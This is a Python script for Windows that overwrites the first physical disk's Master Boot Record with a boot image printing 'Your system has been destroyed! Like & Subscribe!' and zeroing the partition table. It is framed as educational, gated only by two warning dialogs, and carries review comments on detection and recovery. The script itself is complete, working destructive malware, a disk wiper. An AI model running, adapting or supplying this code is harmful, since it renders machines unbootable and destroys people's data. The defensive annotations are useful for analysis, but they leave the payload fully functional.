# Overwriting the Master Boot Record with custom text in Python!
# The Python part changes only slightly: AllocateReadBuffer(512) becomes bytes([ HEX DATA ]).
# However, we will need to implement a boot loader in order to display text.
# Note that this might not work on GPT/UEFI systems, such as some VMware virtual machines.
# To start, we will need to import libraries that can interact with the Windows API from Python.
# A common choice for this is pywin32.
from win32file import * # Features CreateFileW, a function that will be used
from win32api import * # CloseHandle, Sleep etc.
from win32gui import * # GDI functions, unused, however always great to import
from win32con import * # Constants like GENERIC_READ etc
from win32ui import * # Object oriented Windows API objects.
import sys # Used to exit the current process. We might use ExitProcess(0), however this is more pythonic.
# Show two confirmation dialogs before the raw disk write further down.
# NOTE(review): these prompts are the only gate in front of the write. They are a courtesy to the
# person running the script, not a safety control: nothing in this file checks which disk is
# targeted or whether a backup of the sector exists.
title = "! Warning !"
description = "You are about to execute a severly dangerous program that overwrites the Master Boot Record " \
"of your computer. This will cause irrepairable destructive consequences, and the creator is " \
"not responsible for any damage due to this being made for educational and illustrational purposes " \
"only!\n\nPress \"Yes\" to continue.\nPress \"No\" to exit."
# Display the first warning.
# The arguments are the message, the title, and the icon/button style flags.
# MB_YESNO offers only Yes and No, so the result is compared against IDNO. With another button set
# (eg. MB_OKCANCEL) the return values differ and this comparison would have to change with it.
# NOTE(review): more than one of the wildcard-imported modules exports a MessageBox; the
# three-argument call here presumably resolves to win32ui's because it is imported last - confirm.
if MessageBox(description, title, MB_ICONWARNING | MB_YESNO) == IDNO:
print("No pressed")
sys.exit(0)
# Second confirmation, same pattern as the first; title and description are reused.
title = "!! LAST WARNING !!"
description = "This is the last warning! Pressing \"Yes\" will destroy your computer, for a very long time!\n" \
"Are you sure you want to continue, resulting in an unbootable machine?!"
if MessageBox(description, title, MB_ICONWARNING | MB_YESNO) == IDNO:
print("Second no pressed")
sys.exit(0)
# Reached only when neither dialog returned IDNO.
print("MBR overwriting...")
# Open a handle to the first physical disk as a raw device; sector 0 of that disk holds the
# Master Boot Record.
# GENERIC_WRITE requests write access, and FILE_SHARE_READ | FILE_SHARE_WRITE lets other openers
# keep reading and writing the device while this handle exists.
# NOTE(review): Windows grants write access to \\.\PhysicalDriveN only to an elevated
# (administrator) process, so running untrusted scripts without elevation is the first mitigation.
# For detection, a script interpreter opening \\.\PhysicalDrive0 for write is a high-signal event
# (MITRE ATT&CK T1561.002, Disk Structure Wipe).
# NOTE(review): the result is not checked here; pywin32 is expected to raise on failure
# (eg. access denied) rather than return an invalid handle - confirm.
hDevice = CreateFileW(r"\\.\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING,
0, 0)
# The 512-byte image that is written to sector 0: 16-bit boot code that prints a message through
# BIOS int 0x10, the message string, zero padding, and the 0x55 0xAA boot signature in the last
# two bytes.
# NOTE(review): everything between the message and the signature is zero. That span covers the
# region where an MBR keeps its disk signature and partition table (offsets 0x1B8-0x1FD), so
# recovery needs the original sector or a rebuilt partition table, not only fresh boot code.
# Keep a backup of sector 0, and image the disk before attempting any repair.
# The ASCII run that starts at byte 0x59 ("Your system has been destroyed!...") is stored in
# plain text and can serve as a static indicator when triaging this sample.
buffer = bytes([
# paste the boot sector data here
0xE8, 0x15, 0x00, 0xBB, 0x27, 0x7C, 0x8A, 0x07, 0x3C, 0x00, 0x74, 0x0B, 0xE8, 0x03, 0x00, 0x43,
0xEB, 0xF4, 0xB4, 0x0E, 0xCD, 0x10, 0xC3, 0xC3, 0xB4, 0x07, 0xB0, 0x00, 0xB7, 0x04, 0xB9, 0x00,
0x00, 0xBA, 0x4F, 0x18, 0xCD, 0x10, 0xC3, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x73, 0x79, 0x73, 0x74,
0x65, 0x6D, 0x20, 0x68, 0x61, 0x73, 0x20, 0x62, 0x65, 0x65, 0x6E, 0x20, 0x64, 0x65, 0x73, 0x74,
0x72, 0x6F, 0x79, 0x65, 0x64, 0x21, 0x0D, 0x0A, 0x4C, 0x69, 0x6B, 0x65, 0x20, 0x26, 0x20, 0x53,
0x75, 0x62, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65, 0x21, 0x0D, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
])
# Write the buffer through the raw-device handle. No seek is issued on the freshly opened handle,
# so the write lands at offset 0 of the disk.
# NOTE(review): pywin32's WriteFile is documented to return an (error code, bytes written) pair,
# so bytes_written is presumably a tuple and the message below prints the pair rather than a
# byte count - confirm.
# The success message is printed without inspecting either value.
bytes_written = WriteFile(hDevice, buffer, None)
print("Wrote", bytes_written, "bytes to the Master Boot Record successfully!")
# Close the device handle (this releases the handle itself, not a memory allocation).
CloseHandle(hDevice)